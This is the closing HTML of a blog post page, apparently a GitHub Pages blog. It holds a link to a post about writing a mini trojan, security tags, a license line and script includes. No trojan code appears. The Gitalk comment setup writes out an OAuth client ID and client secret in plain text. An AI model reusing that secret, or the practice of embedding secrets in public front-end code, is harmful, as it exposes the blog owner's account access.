    <strong>Link：</strong><a href="https://shijoa.github.io/2020/12/08/%E4%BB%8Emini%E6%9C%A8%E9%A9%AC%E5%BC%80%E5%A7%8B/" title="https:&#x2F;&#x2F;shijoa.github.io&#x2F;2020&#x2F;12&#x2F;08&#x2F;%E4%BB%8Emini%E6%9C%A8%E9%A9%AC%E5%BC%80%E5%A7%8B&#x2F;" target="_blank" rel="noopener">https:&#x2F;&#x2F;shijoa.github.io&#x2F;2020&#x2F;12&#x2F;08&#x2F;%E4%BB%8Emini%E6%9C%A8%E9%A9%AC%E5%BC%80%E5%A7%8B&#x2F;</a><br>
    
      <strong>版权声明：</strong>本文采用 <a href="https://creativecommons.org/licenses/by-nc-sa/3.0/cn/deed.zh" target="_blank">CC BY-NC-SA 3.0 CN</a> 协议进行许可
    
  </div>


  
  
  <div class="nexmoe-post-meta nexmoe-rainbow">
    
        <a class="nexmoefont icon-appstore-fill -link" href="/categories/%E5%AD%A6%E4%B9%A0/">学习</a>
    
    
        <a class="nexmoefont icon-tag-fill -none-link" href="/tags/%E4%BB%A3%E7%A0%81/" rel="tag">代码</a> <a class="nexmoefont icon-tag-fill -none-link" href="/tags/%E5%AE%89%E5%85%A8/" rel="tag">安全</a> <a class="nexmoefont icon-tag-fill -none-link" href="/tags/%E6%9C%A8%E9%A9%AC/" rel="tag">木马</a> <a class="nexmoefont icon-tag-fill -none-link" href="/tags/%E7%BC%96%E7%A8%8B/" rel="tag">编程</a>
    
</div>

  <div class="nexmoe-post-footer">
    <section class="nexmoe-comment">
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/gitalk@1.5.0/dist/gitalk.min.css">
<div id="gitalk"></div>
<script src="https://cdn.jsdelivr.net/npm/gitalk@1.5.0/dist/gitalk.min.js"></script>
<script src="/js/src/md5.min.js"></script>
<script type="text/javascript">
    var gitalk = new Gitalk({
        clientID: '65a6363c4b6bd3c3b2a5',
        clientSecret: '530dcf1ad96ee2fb56f633b421b1b982d6484812',
        id: decodeURI(location.pathname),
        repo: 'ShiJoa.github.io',
        owner: 'ShiJoa',
        admin: 'ShiJoa'
    })
    gitalk.render('gitalk')
</script>
</section>
  </div>
</div>
    </div>
  </div>
  <script src="https://cdn.jsdelivr.net/combine/npm/lazysizes@5.1.0/lazysizes.min.js,gh/highlightjs/cdn-release@9.15.8/build/highlight.min.js,npm/mdui@0.4.3/dist/js/mdui.min.js?v=1"></script>
<script>
	hljs.initHighlightingOnLoad();
</script>

<script src="https://cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.slim.min.js"></script>
<script src="https://cdn.jsdelivr.net/gh/fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js"></script>


<script src="https://cdn.jsdelivr.net/gh/xtaodada/xtaodada.github.io@0.0.2/copy.js"></script>
 <script src="/js/app.js?v=1624862877562"></script>

  





</body>

</html>
